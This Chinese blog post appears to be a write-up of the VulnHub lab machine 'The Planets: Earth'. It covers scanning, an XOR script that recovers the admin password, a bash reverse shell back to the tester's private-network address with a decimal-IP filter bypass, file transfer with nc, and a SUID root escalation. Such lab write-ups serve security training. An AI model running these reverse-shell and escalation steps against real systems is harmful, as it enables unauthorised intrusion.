靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH

最新推荐文章于 2022-11-19 21:59:26 发布
最新推荐文章于 2022-11-19 21:59:26 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: # 靶机练习 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122695436
版权

前期准备:

靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw

kali攻击机ip:192.168.101.10

靶机地址:192.168.101.101

一、信息收集

1.nmap扫描

因为kali与靶机在同一个网段下,使用nmap 192.168.101.0/24 扫描靶机及端口

2.使用nmap -A 192.168.101.101,发现443端口有DNS解析,在hosts文件中添加DNS解析:

使用sudo vim /etc/hosts添加两个hosts文件

3.收集earth.local信息

发现有Previous Messages

Previous Messages:

    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

使用命令dirb https://earth.local扫描一下目录,发现 https://earth.local/admin 目录

进去发现是个登录界面

4.收集terratest.earth.local信息

使用命令dirb https:// terratest.earth.local扫描一下目录,发现有robots.txt文件,去查看一下

进入https://terratest.earth.local/robots.txt后,发现有个testingnotes文件,但是不知道是哪种格式

手动测试后发现是txt格式,访问testingnotes.txt

译文:

测试安全消息系统注意事项:

*使用XOR加密作为算法,在RSA中使用应该是安全的。

*地球已确认他们已收到我们发送的信息。

*testdata.txt 用于测试加密。

*terra 用作管理门户的用户名。

去做:

*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?

*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?

*需要改进消息界面和管理面板的界面,目前非常基础。

这里我们得到了新的信息,加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:

二、漏洞攻击

1.破解密码

写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

Py脚本:

import binascii

data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1,16) ^ int(f,16)))

运行后得到以下数据

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六进制转文本解码一下:

密码是重复的,然后使用用户名 terra ,密码:earthclimatechangebad4humans 登录 https://earth.local/admin

2.发现user_flag

发现可以执行系统命令:

使用find命令查找flag:

发现/var/earth_web/user_flag.txt文件,查看一下:

发现flag [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

3.使用反弹shell连接到靶机

接下来编写个反弹shell:

bash -i >& /dev/tcp/192.168.101.10/1234 0>&1

发现禁止远程连接,发现需要对IP进行进制绕过:

bash -i >& /dev/tcp/3232261386/1234 0>&1

三、提权

查找有权限的命令:

find / -perm -u=s -type f 2>/dev/null

发现有个/usr/bin/ ,感觉可以提权,查看它,运行一下reset_root:

发现报错

检查是否存在重置触发器...

重置失败,所有触发器都不存在。

本地没有调试的命令,使用nc传送到本地调试一下

nc -nlvp 1234 >reset_root

nc 192.168.101.10 1234 < /usr/bin/reset_root

用strace检测问题,要注意给文件加权限命令为chmod +x ,因为没有以下三个文件而报错,查看靶机发现也没有这三个文件:

在靶机中创建这三个文件:

然后再靶机中尝试运行reset_root:

取得root权限,查找flag:

find / -name "*flag*.txt"

cat /root/root_flag.txt

cat /var/earth_web/user_flag.txt

汉南帝
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
United Planets: The Last Crusade:二维多方向射击游戏-开源
04-29
“联合星球:最后的十字军东征”是由意大利团队Unreal Project开发的第一款免费开源视频游戏。 《最后的十字军东征》是一款2D多向射击游戏,为这些旧式视频游戏的玩家带来了新的体验。 该团队现在发布游戏的首批版本...
planets:这是我的第二个 JavaScript 项目,行星的 d3 可视化
06-10
行星 概述 是使用库进行可视化的实验。 该项目的核心基于。 单击行星将缩放其大小,而将鼠标悬停在行星上将为您提供一些基本... 它是在三四天内构建的,是我的第二个 JavaScript 项目。 使用的技术 由凯文麦克雷尼撰写
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3057
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 672
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 948
靶机渗透练习-The PlanetsEarth
VulnHub靶场----Earth
qq_61670993的博客
10-18 485
Vulnhub靶场初体验
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1704
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
Planets Earth Mars and the Moon 0.4.4
08-07
有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版! 有能力请支持正版!...
Planets Earth, Mars and the Moon
12-04
- Unity 5 only : 16K textured planet Earth ! - Ready-to-use prefabs that can be dynamically instantiated. - Highly customizable shaders with normals, night lights, specular, and inner atmosheric ...
Planets:Android练习-列出片段和详细信息片段。 适用于大屏幕
05-03
行星Android练习-列出片段和详细信息片段。 适用于大屏幕
xorcrypt:异或加密解密算法
06-18
异或加密 Usage import xorcrypt print xorcrypt.encrypt("abc", 2) # 'kde' print xorcrypt.decrypt("kde", 2) # 'abc' API encrypt(s, key, M1, IA1, IC1) s => str M1, IA1, IC1 => uint32, 加密因子: 数据传输两端协商,固定 key => 加密key: 一般又服务器端发给客户端 其实encrypt和decrypt是同一函数 c语言代码 // XOR RSA 加密/解密算法 -- 加密解密为同一函数(xor_crypt) // M1 IA1 IC1 是加密因子,即公钥: 服务端和客户端协商好固定 const unsigned int M1 = 1 << 19; const unsigned int IA1 = 2 << 20; c
VulnHub日记(十五): THE PLANETS: EARTH
Dawn_Xi的博客
11-27 2597
参考链接 Vulnhub:THE PLANETS: EARTH 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.136 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.136 dirsearch 枚举目录443和80 dirsearch -u https://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-lis
vulnhub-The Planets: Earth
qq_43006864的博客
06-09 447
The Planets: Earth ~ VulnHub靶机:The Planets: Earth ~ VulnHub攻击机:Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux信息收集nmap 192.168.1.1/24开放了22 80 443 继续探测端口详细信息。又看到了python环境,那基本上就 CVE-2021-4034一打就死。然后注意看这两个dns记录。访问一下80和
vulnhub The Planets: Earth
箭雨镜屋
04-20 951
渗透思路: nmap扫描----探索网站并修改hosts文件----扫描网站目录----探索网站----XOR运算得到terra的admin portal密码----RCE得到反弹shell----发现reset_root有suid----ltrace跟踪库函数发现reset_root执行条件----成功执行reset_root获取root密码并提权
2-vulnhub靶场Earth
qq_49078152的博客
08-14 1645
vulnhub,earth靶机练习
VulnHub | The-Planets:Earth
薛定的餓貓
12-10 3867
The Planets: Earth 目录The Planets: Earth项目地址测试环境信息收集漏洞利用权限提升 项目地址 http://www.vulnhub.com/entry/the-planets-earth,755/ 难度:Easy 测试环境 攻击机:Kali 192.168.56.111 目标靶机:Fedora 192.168.56.110 信息收集 打开目标靶机,使用arp-scan -I eth1 -l指定网卡并扫描局域网内存活机器IP,使用nmap扫描开启了什么端口,然后使用-sV参
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1617
靶机名称Earth
靶机渗透练习84-The PlanetsEarth
hirak0的博客
04-27 2147
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
vulnhub——Earth靶机
Re1_zf的博客
10-28 2033
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
vulnhub靶场 planets
最新发布
08-28
- *3* [靶场练习第二天~vulnhub靶场THE PLANETS: EARTH](https://blog.csdn.net/qq_57976347/article/details/122695436)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值